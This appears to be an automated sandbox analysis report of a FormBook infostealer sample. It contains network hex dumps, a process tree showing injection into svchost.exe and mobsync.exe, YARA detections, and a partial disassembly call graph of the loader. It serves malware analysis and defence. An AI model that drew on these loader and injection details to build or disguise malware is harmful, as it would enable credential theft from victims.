                                                                              Data Raw: 1f 8b 08 00 00 00 00 00 00 03 dd b2 5d 97 e3 46 92 25 f8 9c f1 2b 5c cc 23 05 a9 a2 93 e0 57 7c 80 c1 a8 92 52 52 b7 66 aa 5a 75 4a aa e9 9d 91 b4 39 0e c0 00 78 86 c3 1d e5 ee 20 83 c9 8e 1f d3 67 1e f6 69 9f f6 ec cb be ea 8f ad 39 c0 ef 00 19 8c c8 e8 ae e9 66 04 41 87 b9 d9 b5 6b d7 ee cd 67 df fc f0 ee a7 ff fe e7 6f 49 6a 33 71 7b 76 e3 7e 88 60 32 99 34 72 4b ff fc 53 c3 c5 80 45 b7 67 6f 6e 32 b0 8c 84 29 d3 06 ec a4 f1 d7 9f be a3 57 0d d2 5d df 48 96 c1 a4 31 e5 30 cb 95 b6 0d 12 2a 69 41 62 e6 8c 47 36 9d 44 30 e5 21 d0 f2 a5 4d b8 e4 96 33 41 4d c8 04 4c 7a 25 ce 16 cc b9 56 81 b2 e6 7c 0d 72 9e b1 7b ca 33 96 00 cd 35 b8 26 be 60 3a 81 f3 8a 80 b1 73 01 b7 3c 4b 7c 6e 9a 3f 1b fe 11 cc a4 c1 0a ab 1a 84 ff da 26 55 e4 ff ac 42 6d 17 6b 91 45 89 cd b8 a4 5c 5a cd a5 e1 21 75 69 3e 19 78 9e 97 df 93 de a8 fc 79 b8 e9 56 e8 d8 c6 72 8b 87 3f ff f6 af 09 97 c8 f4 b7 ff a5 08 48 07 a3 59 c4 6e ba d5 f5 d9 8d e0 f2 8e 68 10 93 f3 48 1a c7 37 06 1b a6 e7 24 c5 d3 e4 bc db 0d 84 52 51 c0 50 e6 [TRUNCATED]
                                                                              Data Ascii: ]F%+\#W|RRfZuJ9x gi9fAkgoIj3q{v~`24rKSEgon2)W]H10*iAbG6D0!M3AMLz%V|r{35&`:s<K|n?&UBmkE\Z!ui>xyVr?HYnhH7$RQPBIU^N)m0aAKfA<GeY2jc~wr-'f+|5Fuc6^)pWF+\fcBs{{62RYkLE#`E_k:/&K,ueKnN.|1exXX *t@e,G?\8v'~zrRnHuNH;"_v>E6y[Sj6Wq6z^y5>-oJo2Qq06`hF:8vS?SXi[T$L]u=58639etORN-~6-{q5cW.lN6;;ab
                                                                              Jan 11, 2025 09:30:39.781579018 CET1236INData Raw: ab ad 27 cd 4f e0 24 4b 4e ed d7 62 d3 1a 6b b0 85 96 c4 76 00 4d 30 6f ae f7 8a f2 b5 16 cb 4b 98 4c 26 fa 67 fb eb 43 6b 23 70 b1 12 d8 cc b8 93 1f b3 43 74 54 23 16 2c 69 f8 cb 42 07 d3 f8 a5 88 ae 06 21 3e e3 78 f0 4b 11 83 17 ff 52 f4 3d 2f
                                                                              Data Ascii: 'O$KNbkvM0oKL&gCk#pCtT#,iB!>xKR=/"iNZvamd+33z/.h{"G<[r|I#XFUj=,zO&z(d15>y*&*`PDL46
                                                                              Jan 11, 2025 09:30:39.781601906 CET1236INData Raw: 4a 59 e2 cf b0 05 34 0f 08 53 ae 92 6a 55 c8 08 a2 d6 1e bb 6b fc a0 26 6e f5 2e ed c8 e6 2d b7 08 73 6c f5 65 46 fd ee f7 a7 2f 53 57 bc 59 6b 11 2a a1 f4 4a aa 71 ac a4 a5 31 cb b8 98 ef c6 dc 6e f7 22 8e ed 6e 68 56 ed 71 15 13 e8 6f 24 61 72
                                                                              Data Ascii: JY4SjUk&n.-sleF/SWYk*Jq1n"nhVqo$ar:NVRBJWw\S^>Uaia\cPHGR@Sxe7S<)&Uvwtn9m.qoM%~,~4rC~Y9,?X.(hA%
                                                                              Jan 11, 2025 09:30:39.781615019 CET1236INData Raw: 07 f3 89 99 26 8b 65 56 b5 8f 71 86 ad 97 91 fe 10 9b bb f7 19 8f 6c 5a bd 56 c7 65 6e cc 85 f0 c3 42 6b 90 f6 9d db c7 78 2d 51 29 a6 5f ea 1a 28 6c b5 5e f0 21 2a ad 45 80 63 82 f6 7b f9 3d 31 4a f0 88 bc 0d c3 70 bc b2 cb 05 86 9d 1a 35 b3 70
                                                                              Data Ascii: &eVqlZVenBkx-Q)_(l^!*Ec{=1Jp5pixtY#nr~,~>+*Oe~zy`..\_%Or=tDo[ja[47PjA4\Ig<LG$Nsr%Uj.6d*?3tBSMP
                                                                              Jan 11, 2025 09:30:39.781627893 CET1236INData Raw: b5 4c 27 8b b3 37 6f 22 6e 72 c1 e6 3e a9 8a c8 67 3c cb 95 b6 4c da 31 de 06 68 05 d0 3e 91 aa e6 0a 37 9d b2 08 8d 56 77 9d 02 4f 52 eb 93 1e 7a 75 f7 a6 9a a6 e6 22 63 3a e1 d2 27 1e f1 3a de e5 a3 eb 95 38 95 34 3e a1 5e e7 31 46 c0 c2 bb 44
                                                                              Data Ascii: L'7o"nr>g<L1h>7VwORzu"c:':84>^1FDBFrE\&A]hZ)XqImm*0`kJu^{W"@.{2q]{OK|2q|vzeZn*,J=3}%%(>t_minetB
                                                                              Jan 11, 2025 09:30:39.781780005 CET1236INData Raw: 6a fe 56 30 0d 3e e9 8d 8f 65 0d e9 c0 27 c3 ee e0 68 d2 80 0e 7d 32 e8 0e 9f 48 ea bb a4 fe d1 a4 be 6b d7 7f a2 5d ef 82 5e 23 ef 8b ee f5 d1 b4 6b 4c f4 c9 75 b7 77 b1 97 16 2a a1 50 e7 40 b0 f0 ce 27 6f bd f2 53 9f 13 ce 19 6e 45 14 dc a4 34
                                                                              Data Ascii: jV0>e'h}2Hk]^#kLuw*P@'oSnE4l,}Y-J6.?99@s.]*byS>a^y@,f28\\kehWKxZ^Acw=/=-Jl^.p`'Uv^\`3])GW*i53zx
                                                                              Jan 11, 2025 09:30:39.781790972 CET1236INData Raw: 12 b3 07 9d c1 15 66 1e 4a b9 c2 94 51 c7 bb 38 92 d2 c3 94 5e cd 7d ca 22 35 a3 54 32 5b 68 26 7c 72 91 df 97 df 6b fc ea 24 60 4d af 4d 96 ff 9d fe 23 8e cb ea 08 20 47 f8 3e d6 94 8f 91 57 53 3d 3c 54 8d bf 3a df 74 ae ab 3d d8 59 15 56 70 09
                                                                              Data Ascii: fJQ8^}"5T2[h&|rk$`MM# G>WS=<T:t=YVpn90aCBQvXk,YJ&AIR?b\8,z+FY-l1p:aYm[L7w88&5^WZ=YT\>Vfm?]%
                                                                              Jan 11, 2025 09:30:39.781802893 CET1236INData Raw: 77 9b 1c 2b 22 ae 48 cc 93 9a 3b c8 02 88 0e dc 25 4c 08 d0 f3 03 b7 3c 63 09 1c b8 b3 2c 10 87 ee a6 3c 82 6d 36 ad c5 73 7c 10 e3 99 c6 2c e3 62 5e 57 b1 75 8d 52 a9 68 be ac 30 fc 23 f8 c4 eb 5c 69 c8 c6 0f 9d 94 19 64 83 eb a9 5a 3c c9 a0 cc
                                                                              Data Ascii: w+"H;%L<c,<m6s|,b^WuRh0#\idZ<mx+mKp$^4l~"~Y,N+sk0r&q5XS{5XTTi&Sg}C(K:$>Y-DZ?y#V;U|Wu7/t.Z R!A5(V3cOYC:
                                                                              Jan 11, 2025 09:30:39.781816006 CET1236INData Raw: 42 a5 cb 12 9f 48 25 e1 75 c0 fd 54 4d 41 d7 b4 28 64 04 da a9 70 b8 8f 01 a6 c3 94 ec 07 de bf 17 2c 00 d1 7e 74 51 93 c9 65 5e d8 93 32 97 84 2b 8d 0d ff 08 07 1d e1 2e d1 0f 19 13 a2 85 db 7f 26 f7 92 51 6b 11 28 8d f3 53 cd 22 5e 18 bf 33 18
                                                                              Data Ascii: BH%uTMA(dp,~tQe^2+.&Qk(S"^3hNbWU~CRu<sePk*t V3ci5~p+`e\V*m:f7>ZK<VIsOR;eTxVkaBJ~^O
                                                                              Jan 11, 2025 09:30:39.781827927 CET1236INData Raw: 89 dc 9e 2d 96 f7 a6 e1 2f 1a 7f 98 29 1d e5 1a 8c f9 a5 cb 11 55 b3 d0 f2 29 b7 f3 86 df 48 ad cd fd 5f ba bf 74 03 a1 54 14 30 c1 64 08 21 cb 4d 07 75 ce 7f 71 c3 70 19 8a 22 02 2c fe 80 df 88 1b fb 4b b7 a2 42 33 15 15 02 f6 61 dd 6b 04 f7 9d
                                                                              Data Ascii: -/)U)H_tT0d!Muqp",KB3ak)w\#W,GFpRq3&Jz{\axG4DC$SmWq_]0Hx~0lVrcvH;6Vy%uz1
                                                                              Jan 11, 2025 09:30:39.786432981 CET1236INData Raw: 33 b9 a9 48 99 8c 04 b8 9a ff 5a 5d 95 35 b7 37 66 9a 90 19 8f 6c 3a 69 f4 87 0d 92 82 73 44 75 be cf 84 c4 11 52 6b 73 bf db 9d cd 66 9d d9 a0 a3 74 d2 ed 7b 9e d7 c5 c2 06 99 72 98 7d ad ee 27 0d 8f 78 a4 3f 24 ae ac 12 8a 47 11 60 7b ab 0b 68
                                                                              Data Ascii: 3HZ]57fl:isDuRksft{r}'x?$G`{hr,r%XI3jh.64z.OvY&g:&LELrJ8,AIXfM48I%3fC4dB,3.-*l]wpH2<B%p"J0)-


                                                                              Statistics

                                                                              CPU Usage

                                                                              Click to jump to process

                                                                              Memory Usage

                                                                              Click to jump to process

                                                                              High Level Behavior Distribution

                                                                              Click to dive into process behavior distribution

                                                                              Behavior

                                                                              Click to jump to process

                                                                              System Behavior

                                                                              General

                                                                              Target ID:0
                                                                              Start time:03:26:29
                                                                              Start date:11/01/2025
                                                                              Path:C:\Users\user\Desktop\qbSIgCrCgw.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\Desktop\qbSIgCrCgw.exe"
                                                                              Imagebase:0x3b0000
                                                                              File size:1'223'168 bytes
                                                                              MD5 hash:8057AAA332A2045B3ACB5040BAD45772
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:2
                                                                              Start time:03:26:30
                                                                              Start date:11/01/2025
                                                                              Path:C:\Windows\SysWOW64\svchost.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\Desktop\qbSIgCrCgw.exe"
                                                                              Imagebase:0x630000
                                                                              File size:46'504 bytes
                                                                              MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1668607265.00000000033A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1668177200.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1669021668.0000000005A00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:4
                                                                              Start time:03:26:45
                                                                              Start date:11/01/2025
                                                                              Path:C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe"
                                                                              Imagebase:0x420000
                                                                              File size:140'800 bytes
                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3900792299.0000000004940000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:high
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:6
                                                                              Start time:03:26:47
                                                                              Start date:11/01/2025
                                                                              Path:C:\Windows\SysWOW64\mobsync.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Windows\SysWOW64\mobsync.exe"
                                                                              Imagebase:0x50000
                                                                              File size:93'696 bytes
                                                                              MD5 hash:F7114D05B442F103BD2D3E20E78A7AA5
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3898728526.0000000002A30000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3898911867.0000000002CE0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3899007570.0000000002D80000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:moderate
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:8
                                                                              Start time:03:27:01
                                                                              Start date:11/01/2025
                                                                              Path:C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe"
                                                                              Imagebase:0x420000
                                                                              File size:140'800 bytes
                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3900807992.0000000002280000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:high
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:9
                                                                              Start time:03:27:13
                                                                              Start date:11/01/2025
                                                                              Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                              Imagebase:0x7ff6d20e0000
                                                                              File size:676'768 bytes
                                                                              MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Disassembly

                                                                              Reset < >

                                                                                Execution Graph

                                                                                Execution Coverage:3.6%
                                                                                Dynamic/Decrypted Code Coverage:2%
                                                                                Signature Coverage:7.4%
                                                                                Total number of Nodes:1949
                                                                                Total number of Limit Nodes:169
                                                                                execution_graph 93195 10098a0 93209 10074f0 93195->93209 93197 10099b7 93212 1009790 93197->93212 93199 10099e0 CreateFileW 93201 1009a32 93199->93201 93202 1009a37 93199->93202 93202->93201 93203 1009a4e VirtualAlloc 93202->93203 93203->93201 93204 1009a6c ReadFile 93203->93204 93204->93201 93205 1009a8a 93204->93205 93206 1008790 13 API calls 93205->93206 93207 1009abd 93206->93207 93208 1009ae0 ExitProcess 93207->93208 93208->93201 93211 1007b7b 93209->93211 93215 100a9e0 GetPEB 93209->93215 93211->93197 93213 1009799 Sleep 93212->93213 93214 10097a7 93213->93214 93215->93211 93216 3d5dfd 93217 3d5e09 __mtinitlocknum 93216->93217 93253 3d7eeb GetStartupInfoW 93217->93253 93219 3d5e0e 93255 3d9ca7 GetProcessHeap 93219->93255 93221 3d5e66 93222 3d5e71 93221->93222 93340 3d5f4d 47 API calls 3 library calls 93221->93340 93256 3d7b47 93222->93256 93225 3d5e77 93226 3d5e82 __RTC_Initialize 93225->93226 93341 3d5f4d 47 API calls 3 library calls 93225->93341 93277 3dacb3 93226->93277 93229 3d5e91 93230 3d5e9d GetCommandLineW 93229->93230 93342 3d5f4d 47 API calls 3 library calls 93229->93342 93296 3e2e7d GetEnvironmentStringsW 93230->93296 93233 3d5e9c 93233->93230 93237 3d5ec2 93309 3e2cb4 93237->93309 93240 3d5ec8 93241 3d5ed3 93240->93241 93344 3d115b 47 API calls 3 library calls 93240->93344 93323 3d1195 93241->93323 93244 3d5edb 93245 3d5ee6 __wwincmdln 93244->93245 93345 3d115b 47 API calls 3 library calls 93244->93345 93327 3b3a0f 93245->93327 93248 3d5efa 93249 3d5f09 93248->93249 93346 3d13f1 47 API calls _doexit 93248->93346 93347 3d1186 47 API calls _doexit 93249->93347 93252 3d5f0e __mtinitlocknum 93254 3d7f01 93253->93254 93254->93219 93255->93221 93348 3d123a 30 API calls 2 library calls 93256->93348 93258 3d7b4c 93349 3d7e23 InitializeCriticalSectionAndSpinCount 93258->93349 93260 3d7b51 93261 3d7b55 93260->93261 93351 3d7e6d TlsAlloc 93260->93351 93350 3d7bbd 50 API calls 2 library calls 93261->93350 93264 3d7b5a 93264->93225 93265 3d7b67 93265->93261 93266 3d7b72 93265->93266 93352 3d6986 93266->93352 93269 3d7bb4 93360 3d7bbd 50 API calls 2 library calls 93269->93360 93272 3d7bb9 93272->93225 93273 3d7b93 93273->93269 93274 3d7b99 93273->93274 93359 3d7a94 47 API calls 4 library calls 93274->93359 93276 3d7ba1 GetCurrentThreadId 93276->93225 93278 3dacbf __mtinitlocknum 93277->93278 93369 3d7cf4 93278->93369 93280 3dacc6 93281 3d6986 __calloc_crt 47 API calls 93280->93281 93282 3dacd7 93281->93282 93283 3dad42 GetStartupInfoW 93282->93283 93284 3dace2 __mtinitlocknum @_EH4_CallFilterFunc@8 93282->93284 93291 3dae80 93283->93291 93293 3dad57 93283->93293 93284->93229 93285 3daf44 93376 3daf58 LeaveCriticalSection _doexit 93285->93376 93287 3daec9 GetStdHandle 93287->93291 93288 3d6986 __calloc_crt 47 API calls 93288->93293 93289 3daedb GetFileType 93289->93291 93290 3dada5 93290->93291 93294 3dade5 InitializeCriticalSectionAndSpinCount 93290->93294 93295 3dadd7 GetFileType 93290->93295 93291->93285 93291->93287 93291->93289 93292 3daf08 InitializeCriticalSectionAndSpinCount 93291->93292 93292->93291 93293->93288 93293->93290 93293->93291 93294->93290 93295->93290 93295->93294 93297 3e2e8e 93296->93297 93298 3d5ead 93296->93298 93415 3d69d0 47 API calls __crtCompareStringA_stat 93297->93415 93303 3e2a7b GetModuleFileNameW 93298->93303 93301 3e2eb4 ___crtGetEnvironmentStringsW 93302 3e2eca FreeEnvironmentStringsW 93301->93302 93302->93298 93304 3e2aaf _wparse_cmdline 93303->93304 93305 3d5eb7 93304->93305 93306 3e2ae9 93304->93306 93305->93237 93343 3d115b 47 API calls 3 library calls 93305->93343 93416 3d69d0 47 API calls __crtCompareStringA_stat 93306->93416 93308 3e2aef _wparse_cmdline 93308->93305 93310 3e2ccd __NMSG_WRITE 93309->93310 93314 3e2cc5 93309->93314 93311 3d6986 __calloc_crt 47 API calls 93310->93311 93319 3e2cf6 __NMSG_WRITE 93311->93319 93312 3e2d4d 93313 3d1c9d _free 47 API calls 93312->93313 93313->93314 93314->93240 93315 3d6986 __calloc_crt 47 API calls 93315->93319 93316 3e2d72 93318 3d1c9d _free 47 API calls 93316->93318 93318->93314 93319->93312 93319->93314 93319->93315 93319->93316 93320 3e2d89 93319->93320 93417 3e2567 47 API calls 2 library calls 93319->93417 93418 3d6e20 IsProcessorFeaturePresent 93320->93418 93322 3e2d95 93322->93240 93324 3d11a1 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 93323->93324 93326 3d11e0 __IsNonwritableInCurrentImage 93324->93326 93441 3d0f0a 52 API calls __cinit 93324->93441 93326->93244 93328 3b3a29 93327->93328 93329 421ebf 93327->93329 93330 3b3a63 IsThemeActive 93328->93330 93442 3d1405 93330->93442 93334 3b3a8f 93454 3b3adb SystemParametersInfoW SystemParametersInfoW 93334->93454 93336 3b3a9b 93455 3b3d19 93336->93455 93338 3b3aa3 SystemParametersInfoW 93339 3b3ac8 93338->93339 93339->93248 93340->93222 93341->93226 93342->93233 93346->93249 93347->93252 93348->93258 93349->93260 93350->93264 93351->93265 93355 3d698d 93352->93355 93354 3d69ca 93354->93269 93358 3d7ec9 TlsSetValue 93354->93358 93355->93354 93356 3d69ab Sleep 93355->93356 93361 3e30aa 93355->93361 93357 3d69c2 93356->93357 93357->93354 93357->93355 93358->93273 93359->93276 93360->93272 93362 3e30b5 93361->93362 93367 3e30d0 __calloc_impl 93361->93367 93363 3e30c1 93362->93363 93362->93367 93368 3d7c0e 47 API calls __getptd_noexit 93363->93368 93365 3e30e0 HeapAlloc 93366 3e30c6 93365->93366 93365->93367 93366->93355 93367->93365 93367->93366 93368->93366 93370 3d7d18 EnterCriticalSection 93369->93370 93371 3d7d05 93369->93371 93370->93280 93377 3d7d7c 93371->93377 93373 3d7d0b 93373->93370 93401 3d115b 47 API calls 3 library calls 93373->93401 93376->93284 93378 3d7d88 __mtinitlocknum 93377->93378 93379 3d7da9 93378->93379 93380 3d7d91 93378->93380 93381 3d7da7 93379->93381 93387 3d7e11 __mtinitlocknum 93379->93387 93402 3d81c2 47 API calls __NMSG_WRITE 93380->93402 93381->93379 93405 3d69d0 47 API calls __crtCompareStringA_stat 93381->93405 93384 3d7d96 93403 3d821f 47 API calls 5 library calls 93384->93403 93385 3d7dbd 93388 3d7dc4 93385->93388 93389 3d7dd3 93385->93389 93387->93373 93406 3d7c0e 47 API calls __getptd_noexit 93388->93406 93393 3d7cf4 __lock 46 API calls 93389->93393 93390 3d7d9d 93404 3d1145 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 93390->93404 93395 3d7dda 93393->93395 93394 3d7dc9 93394->93387 93396 3d7dfe 93395->93396 93397 3d7de9 InitializeCriticalSectionAndSpinCount 93395->93397 93407 3d1c9d 93396->93407 93398 3d7e04 93397->93398 93413 3d7e1a LeaveCriticalSection _doexit 93398->93413 93402->93384 93403->93390 93405->93385 93406->93394 93408 3d1ca6 RtlFreeHeap 93407->93408 93409 3d1ccf _free 93407->93409 93408->93409 93410 3d1cbb 93408->93410 93409->93398 93414 3d7c0e 47 API calls __getptd_noexit 93410->93414 93412 3d1cc1 GetLastError 93412->93409 93413->93387 93414->93412 93415->93301 93416->93308 93417->93319 93419 3d6e2b 93418->93419 93424 3d6cb5 93419->93424 93423 3d6e46 93423->93322 93425 3d6ccf _memset __call_reportfault 93424->93425 93426 3d6cef IsDebuggerPresent 93425->93426 93432 3d81ac SetUnhandledExceptionFilter UnhandledExceptionFilter 93426->93432 93429 3d6db3 __call_reportfault 93433 3da70c 93429->93433 93430 3d6dd6 93431 3d8197 GetCurrentProcess TerminateProcess 93430->93431 93431->93423 93432->93429 93434 3da714 93433->93434 93435 3da716 IsProcessorFeaturePresent 93433->93435 93434->93430 93437 3e37b0 93435->93437 93440 3e375f 5 API calls 2 library calls 93437->93440 93439 3e3893 93439->93430 93440->93439 93441->93326 93443 3d7cf4 __lock 47 API calls 93442->93443 93444 3d1410 93443->93444 93507 3d7e58 LeaveCriticalSection 93444->93507 93446 3b3a88 93447 3d146d 93446->93447 93448 3d1477 93447->93448 93449 3d1491 93447->93449 93448->93449 93508 3d7c0e 47 API calls __getptd_noexit 93448->93508 93449->93334 93451 3d1481 93509 3d6e10 8 API calls __woutput_l 93451->93509 93453 3d148c 93453->93334 93454->93336 93456 3b3d26 __ftell_nolock 93455->93456 93510 3bd7f7 93456->93510 93460 3b3d57 IsDebuggerPresent 93461 421cc1 MessageBoxA 93460->93461 93462 3b3d65 93460->93462 93465 421cd9 93461->93465 93463 3b3e3a 93462->93463 93462->93465 93466 3b3d82 93462->93466 93464 3b3e41 SetCurrentDirectoryW 93463->93464 93468 3b3e4e Mailbox 93464->93468 93712 3cc682 48 API calls 93465->93712 93589 3b40e5 93466->93589 93468->93338 93470 421ce9 93475 421cff SetCurrentDirectoryW 93470->93475 93472 3b3da0 GetFullPathNameW 93605 3b6a63 93472->93605 93474 3b3ddb 93616 3b6430 93474->93616 93475->93468 93478 3b3df6 93479 3b3e00 93478->93479 93713 3f71fa AllocateAndInitializeSid CheckTokenMembership FreeSid 93478->93713 93632 3b3e6e GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 93479->93632 93482 421d1c 93482->93479 93485 421d2d 93482->93485 93714 3b5374 93485->93714 93486 3b3e0a 93488 3b3e1f 93486->93488 93640 3b4ffc 93486->93640 93650 3be8d0 93488->93650 93490 421d35 93721 3bce19 93490->93721 93494 421d42 93496 421d49 93494->93496 93497 421d6e 93494->93497 93727 3b518c 93496->93727 93498 3b518c 48 API calls 93497->93498 93501 421d6a GetForegroundWindow ShellExecuteW 93498->93501 93505 421d9e Mailbox 93501->93505 93505->93463 93506 3b518c 48 API calls 93506->93501 93507->93446 93508->93451 93509->93453 93746 3cf4ea 93510->93746 93512 3bd818 93513 3cf4ea 48 API calls 93512->93513 93514 3b3d31 GetCurrentDirectoryW 93513->93514 93515 3b61ca 93514->93515 93777 3ce99b 93515->93777 93519 3b61eb 93520 3b5374 50 API calls 93519->93520 93521 3b61ff 93520->93521 93522 3bce19 48 API calls 93521->93522 93523 3b620c 93522->93523 93794 3b39db 93523->93794 93525 3b6216 Mailbox 93806 3b6eed 93525->93806 93530 3bce19 48 API calls 93531 3b6244 93530->93531 93813 3bd6e9 93531->93813 93533 3b6254 Mailbox 93534 3bce19 48 API calls 93533->93534 93535 3b627c 93534->93535 93536 3bd6e9 55 API calls 93535->93536 93537 3b628f Mailbox 93536->93537 93538 3bce19 48 API calls 93537->93538 93539 3b62a0 93538->93539 93817 3bd645 93539->93817 93541 3b62b2 Mailbox 93542 3bd7f7 48 API calls 93541->93542 93543 3b62c5 93542->93543 93827 3b63fc 93543->93827 93547 3b62df 93548 3b62e9 93547->93548 93549 421c08 93547->93549 93550 3d0fa7 _W_store_winword 59 API calls 93548->93550 93551 3b63fc 48 API calls 93549->93551 93552 3b62f4 93550->93552 93553 421c1c 93551->93553 93552->93553 93554 3b62fe 93552->93554 93555 3b63fc 48 API calls 93553->93555 93556 3d0fa7 _W_store_winword 59 API calls 93554->93556 93557 421c38 93555->93557 93558 3b6309 93556->93558 93560 3b5374 50 API calls 93557->93560 93558->93557 93559 3b6313 93558->93559 93561 3d0fa7 _W_store_winword 59 API calls 93559->93561 93562 421c5d 93560->93562 93563 3b631e 93561->93563 93564 3b63fc 48 API calls 93562->93564 93565 3b635f 93563->93565 93567 421c86 93563->93567 93571 3b63fc 48 API calls 93563->93571 93568 421c69 93564->93568 93566 3b636c 93565->93566 93565->93567 93843 3cc050 93566->93843 93569 3b6eed 48 API calls 93567->93569 93570 3b6eed 48 API calls 93568->93570 93572 421ca8 93569->93572 93574 421c77 93570->93574 93575 3b6342 93571->93575 93577 3b63fc 48 API calls 93572->93577 93579 3b63fc 48 API calls 93574->93579 93576 3b6eed 48 API calls 93575->93576 93580 3b6350 93576->93580 93581 421cb5 93577->93581 93578 3b6384 93854 3c1b90 93578->93854 93579->93567 93583 3b63fc 48 API calls 93580->93583 93581->93581 93583->93565 93584 3c1b90 48 API calls 93586 3b6394 93584->93586 93586->93584 93587 3b63fc 48 API calls 93586->93587 93588 3b63d6 Mailbox 93586->93588 93870 3b6b68 48 API calls 93586->93870 93587->93586 93588->93460 93590 3b40f2 __ftell_nolock 93589->93590 93591 3b410b 93590->93591 93592 42370e _memset 93590->93592 94425 3b660f 93591->94425 93594 42372a GetOpenFileNameW 93592->93594 93596 423779 93594->93596 93599 3b6a63 48 API calls 93596->93599 93601 42378e 93599->93601 93601->93601 93602 3b4129 94450 3b4139 93602->94450 93606 3b6adf 93605->93606 93608 3b6a6f __NMSG_WRITE 93605->93608 93607 3bb18b 48 API calls 93606->93607 93615 3b6ab6 ___crtGetEnvironmentStringsW 93607->93615 93609 3b6a8b 93608->93609 93610 3b6ad7 93608->93610 94670 3b6b4a 93609->94670 94673 3bc369 48 API calls 93610->94673 93613 3b6a95 93614 3cee75 48 API calls 93613->93614 93614->93615 93615->93474 93617 3b643d __ftell_nolock 93616->93617 94674 3b4c75 93617->94674 93619 3b6442 93620 3b3dee 93619->93620 94685 3b5928 86 API calls 93619->94685 93620->93470 93620->93478 93622 3b644f 93622->93620 94686 3b5798 88 API calls Mailbox 93622->94686 93624 3b6458 93624->93620 93625 3b645c GetFullPathNameW 93624->93625 93626 3b6a63 48 API calls 93625->93626 93627 3b6488 93626->93627 93628 3b6a63 48 API calls 93627->93628 93629 3b6495 93628->93629 93630 425dcf _wcscat 93629->93630 93631 3b6a63 48 API calls 93629->93631 93631->93620 93633 3b3ed8 93632->93633 93634 421cba 93632->93634 94733 3b4024 93633->94733 93638 3b3e05 93639 3b36b8 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 93638->93639 93639->93486 93641 3b5027 _memset 93640->93641 94738 3b4c30 93641->94738 93644 3b50ac 93646 3b50ca Shell_NotifyIconW 93644->93646 93647 423d28 Shell_NotifyIconW 93644->93647 94742 3b51af 93646->94742 93649 3b50df 93649->93488 93651 3be8f6 93650->93651 93709 3be906 Mailbox 93650->93709 93652 3bed52 93651->93652 93651->93709 94851 3ce3cd 331 API calls 93652->94851 93654 3b3e2a 93654->93463 93711 3b3847 Shell_NotifyIconW _memset 93654->93711 93656 3bed63 93656->93654 93658 3bed70 93656->93658 93657 3be94c PeekMessageW 93657->93709 94853 3ce312 331 API calls Mailbox 93658->94853 93659 42526e Sleep 93659->93709 93661 3bed77 LockWindowUpdate DestroyWindow GetMessageW 93661->93654 93665 3beda9 93661->93665 93663 3bebc7 93663->93654 94852 3b2ff6 16 API calls 